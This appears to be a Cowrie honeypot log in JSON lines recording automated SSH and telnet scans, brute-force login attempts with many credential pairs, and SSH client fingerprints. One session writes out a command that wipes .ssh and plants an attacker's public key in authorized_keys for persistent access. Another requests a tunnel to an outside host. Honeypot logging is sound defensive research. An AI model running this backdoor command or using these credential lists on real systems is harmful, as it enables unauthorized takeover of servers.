sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T10:48:53.517751Z","src_ip":"212.227.125.160","session":"1cabbee5684d"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:48:53.849869Z","src_ip":"212.227.125.160","session":"1cabbee5684d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T10:48:53.960986Z","session":"1cabbee5684d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50078,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7ab1c8745c7","protocol":"telnet","message":"New connection: 212.227.235.229:50078 (1.2.3.4:23) [session: d7ab1c8745c7]","sensor":"my-vps","timestamp":"2025-08-28T10:49:04.595204Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:49:04.776202Z","src_ip":"212.227.235.229","session":"d7ab1c8745c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:49:05.198991Z","src_ip":"212.227.235.229","session":"d7ab1c8745c7"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T10:49:05.200493Z","src_ip":"212.227.235.229","session":"d7ab1c8745c7"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T10:49:05.201393Z","src_ip":"212.227.235.229","session":"d7ab1c8745c7"}
{"eventid":"cowrie.session.connect","src_ip":"47.253.227.124","src_port":57942,"dst_ip":"1.2.3.4","dst_port":22,"session":"a669e3ec0422","protocol":"ssh","message":"New connection: 47.253.227.124:57942 (1.2.3.4:22) [session: a669e3ec0422]","sensor":"my-vps","timestamp":"2025-08-28T10:49:20.102050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:49:20.102852Z","src_ip":"47.253.227.124","session":"a669e3ec0422"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T10:49:20.206005Z","src_ip":"47.253.227.124","session":"a669e3ec0422"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:49:20.661860Z","src_ip":"47.253.227.124","session":"a669e3ec0422"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:49:20.768028Z","src_ip":"47.253.227.124","session":"a669e3ec0422"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49707,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3b84e87b618","protocol":"ssh","message":"New connection: 212.227.235.229:49707 (1.2.3.4:22) [session: c3b84e87b618]","sensor":"my-vps","timestamp":"2025-08-28T10:49:29.819752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:49:29.820782Z","src_ip":"212.227.235.229","session":"c3b84e87b618"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:49:29.944847Z","src_ip":"212.227.235.229","session":"c3b84e87b618"}
{"eventid":"cowrie.login.failed","username":"admin","password":"atjp4CDA","message":"login attempt [admin/atjp4CDA] failed","sensor":"my-vps","timestamp":"2025-08-28T10:49:30.529349Z","src_ip":"212.227.235.229","session":"c3b84e87b618"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T10:49:31.655733Z","src_ip":"212.227.235.229","session":"c3b84e87b618"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Enercon24","message":"login attempt [admin/Enercon24] failed","sensor":"my-vps","timestamp":"2025-08-28T10:49:32.782069Z","src_ip":"212.227.235.229","session":"c3b84e87b618"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1150221410*","message":"login attempt [admin/1150221410*] failed","sensor":"my-vps","timestamp":"2025-08-28T10:49:33.909469Z","src_ip":"212.227.235.229","session":"c3b84e87b618"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":58260,"dst_ip":"1.2.3.4","dst_port":22,"session":"5585d8ab1b16","protocol":"ssh","message":"New connection: 27.112.79.123:58260 (1.2.3.4:22) [session: 5585d8ab1b16]","sensor":"my-vps","timestamp":"2025-08-28T10:49:34.659939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:49:34.660835Z","src_ip":"27.112.79.123","session":"5585d8ab1b16"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:49:34.922632Z","src_ip":"27.112.79.123","session":"5585d8ab1b16"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin12345","message":"login attempt [admin/admin12345] failed","sensor":"my-vps","timestamp":"2025-08-28T10:49:35.035894Z","src_ip":"212.227.235.229","session":"c3b84e87b618"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456+","message":"login attempt [root/Ab123456+] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:49:36.013253Z","src_ip":"27.112.79.123","session":"5585d8ab1b16"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:49:36.178447Z","src_ip":"212.227.235.229","session":"c3b84e87b618"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:49:36.556706Z","src_ip":"27.112.79.123","session":"5585d8ab1b16"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:49:36.557427Z","src_ip":"27.112.79.123","session":"5585d8ab1b16"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:49:36.558470Z","src_ip":"27.112.79.123","session":"5585d8ab1b16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:49:36.823447Z","src_ip":"27.112.79.123","session":"5585d8ab1b16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:49:37.408072Z","src_ip":"27.112.79.123","session":"5585d8ab1b16"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T10:49:37.408753Z","src_ip":"27.112.79.123","session":"5585d8ab1b16"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T10:49:37.676610Z","src_ip":"27.112.79.123","session":"5585d8ab1b16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:49:37.677457Z","src_ip":"27.112.79.123","session":"5585d8ab1b16"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":41830,"dst_ip":"1.2.3.4","dst_port":22,"session":"f04bbdf5b0fc","protocol":"ssh","message":"New connection: 27.112.79.123:41830 (1.2.3.4:22) [session: f04bbdf5b0fc]","sensor":"my-vps","timestamp":"2025-08-28T10:49:37.950815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:49:37.952195Z","src_ip":"27.112.79.123","session":"f04bbdf5b0fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:49:38.221324Z","src_ip":"27.112.79.123","session":"f04bbdf5b0fc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T10:49:39.340179Z","src_ip":"27.112.79.123","session":"f04bbdf5b0fc"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:49:40.612509Z","src_ip":"27.112.79.123","session":"f04bbdf5b0fc"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":41844,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd0c3d73163a","protocol":"ssh","message":"New connection: 27.112.79.123:41844 (1.2.3.4:22) [session: fd0c3d73163a]","sensor":"my-vps","timestamp":"2025-08-28T10:49:40.874718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:49:40.875624Z","src_ip":"27.112.79.123","session":"fd0c3d73163a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:49:41.137135Z","src_ip":"27.112.79.123","session":"fd0c3d73163a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:49:42.225512Z","src_ip":"27.112.79.123","session":"fd0c3d73163a"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:49:42.488382Z","src_ip":"27.112.79.123","session":"5585d8ab1b16"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:49:42.489440Z","src_ip":"27.112.79.123","session":"fd0c3d73163a"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:50:03.406198Z","src_ip":"212.227.125.160","session":"1cabbee5684d"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":54808,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2d767982042","protocol":"ssh","message":"New connection: 27.112.79.123:54808 (1.2.3.4:22) [session: c2d767982042]","sensor":"my-vps","timestamp":"2025-08-28T10:50:53.020166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:50:53.021017Z","src_ip":"27.112.79.123","session":"c2d767982042"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:50:53.291631Z","src_ip":"27.112.79.123","session":"c2d767982042"}
{"eventid":"cowrie.login.failed","username":"maria","password":"maria","message":"login attempt [maria/maria] failed","sensor":"my-vps","timestamp":"2025-08-28T10:50:54.417698Z","src_ip":"27.112.79.123","session":"c2d767982042"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60752,"dst_ip":"1.2.3.4","dst_port":22,"session":"e58fafb01653","protocol":"ssh","message":"New connection: 212.227.235.229:60752 (1.2.3.4:22) [session: e58fafb01653]","sensor":"my-vps","timestamp":"2025-08-28T10:50:55.163264Z"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:50:55.689705Z","src_ip":"27.112.79.123","session":"c2d767982042"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-28T10:50:55.928123Z","src_ip":"212.227.235.229","session":"e58fafb01653"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-28T10:50:57.081250Z","src_ip":"212.227.235.229","session":"e58fafb01653"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:51:03.788303Z","src_ip":"212.227.235.229","session":"e58fafb01653"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55484,"dst_ip":"1.2.3.4","dst_port":22,"session":"2580d5b6c44c","protocol":"ssh","message":"New connection: 217.72.205.35:55484 (1.2.3.4:22) [session: 2580d5b6c44c]","sensor":"my-vps","timestamp":"2025-08-28T10:51:12.357927Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:51:12.359043Z","src_ip":"217.72.205.35","session":"2580d5b6c44c"}
